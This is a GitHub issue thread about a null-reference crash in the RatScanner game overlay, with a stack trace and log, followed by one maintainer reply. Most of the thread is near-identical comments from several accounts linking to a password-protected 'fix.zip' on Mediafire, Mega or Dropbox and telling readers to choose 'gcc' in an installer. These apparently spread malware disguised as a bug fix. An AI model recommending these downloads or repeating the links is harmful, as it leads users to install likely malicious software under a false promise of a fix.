### ISSUE TITLE
Object reference not set to an instance of an object. [i have been having thumbnails persist on the screen in the ratscanner overlay]

### ISSUE THREAD

**Issue by bathsaltus** [RatScanner/RatScanner#661]
**Error**
Object reference not set to an instance of an object.
```
System.NullReferenceException: Object reference not set to an instance of an object.
   at RatScanner.HotkeyManager.<>c.<OnCloseInteractableOverlayHotkey>b__14_0()
   at RatScanner.HotkeyManager.Wrap(Action action)
```
<details>
<summary>Log</summary>

```
[04:53:33.0883268] > [Info]  ----- RatScanner 3.7.3 -----
[04:53:33.0909028] > [Info]  Screen Info: 3840x2160 at 150%
[04:53:33.0909172] > [Info]  Initializing TarkovDev API...
[04:53:33.0958976] > [Info]  Queueing request for query: "{   data: hideoutStations {   ..."
[04:53:33.0959644] > [Info]  Queueing request for query: "{   data: tasks {     id     ..."
[04:53:33.1264733] > [Info]  Queueing request for query: "query{data:items(lang:en,gameMod..."
[04:53:35.9584237] > [Info]  Refreshed cache in 2831ms (1085ms) for query: "query{data:items(lang:en,gameMod..."
[04:53:56.4476982] > [Info]  Refreshed cache in 23351ms (22ms) for query: "{   data: hideoutStations {   ..."
[04:54:06.7437740] > [Info]  Refreshed cache in 33647ms (35ms) for query: "{   data: tasks {     id     ..."
[04:54:06.7455350] > [Info]  Initializing tarkov tracker database
[04:54:06.7456500] > [Info]  Initializing hotkey manager...
[04:54:06.7494190] > [Info]  UI Ready!
[04:54:06.7494252] > [Info]  Initializing RatEye...
[04:54:08.2306150] > [Info]  Checking for updates...
[04:54:08.2318013] > [Info]  Loading resource "RSClientVersion"...
[04:54:08.6578567] > [Info]  A new version is available: 3.7.4
[04:54:08.6578682] > [Info]  Loading resource "RSClientForceUpdateVersions"...
[04:54:38.9876746] > [Info]  Queueing request for query: "{   data: tasks {     id     ..."
[04:54:38.9879294] > [Info]  Queueing request for query: "{   data: hideoutStations {   ..."
[04:54:38.9880812] > [Info]  Queueing request for query: "query{data:items(lang:en,gameMod..."
[04:54:39.1158835] > [Info]  Refreshed cache in 127ms (1ms) for query: "{   data: hideoutStations {   ..."
[04:54:39.1821968] > [Info]  Refreshed cache in 194ms (16ms) for query: "{   data: tasks {     id     ..."
[04:54:40.0179744] > [Info]  Refreshed cache in 1029ms (385ms) for query: "query{data:items(lang:en,gameMod..."
[04:54:40.0184731] > [Info]  Saving config...
[04:54:40.0482299] > [Info]  Config saved!
[04:54:47.3897205] > [Info]  Queueing request for query: "{   data: hideoutStations {   ..."
[04:54:47.3900904] > [Info]  Queueing request for query: "query{data:items(lang:en,gameMod..."
[04:54:47.4593161] > [Info]  Refreshed cache in 69ms (1ms) for query: "{   data: hideoutStations {   ..."
[04:54:47.5718878] > [Info]  Refreshed cache in 182ms (18ms) for query: "{   data: tasks {     id     ..."
[04:54:48.4066286] > [Info]  Refreshed cache in 1016ms (398ms) for query: "query{data:items(lang:en,gameMod..."
[04:54:48.4067302] > [Info]  Saving config...
[04:54:48.4302065] > [Info]  Config saved!
[04:54:53.2997371] > [Info]  Queueing request for query: "{   data: tasks {     id     ..."
[04:54:53.2997496] > [Info]  Queueing request for query: "{   data: hideoutStations {   ..."
[04:54:53.3000362] > [Info]  Queueing request for query: "query{data:items(lang:en,gameMod..."
[04:54:53.3460694] > [Info]  Refreshed cache in 46ms (1ms) for query: "{   data: hideoutStations {   ..."
[04:54:53.3954609] > [Info]  Refreshed cache in 9
```
</details>

**Comment by Blightbuster** [comment]
Please update to RatScanner 3.7.3

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
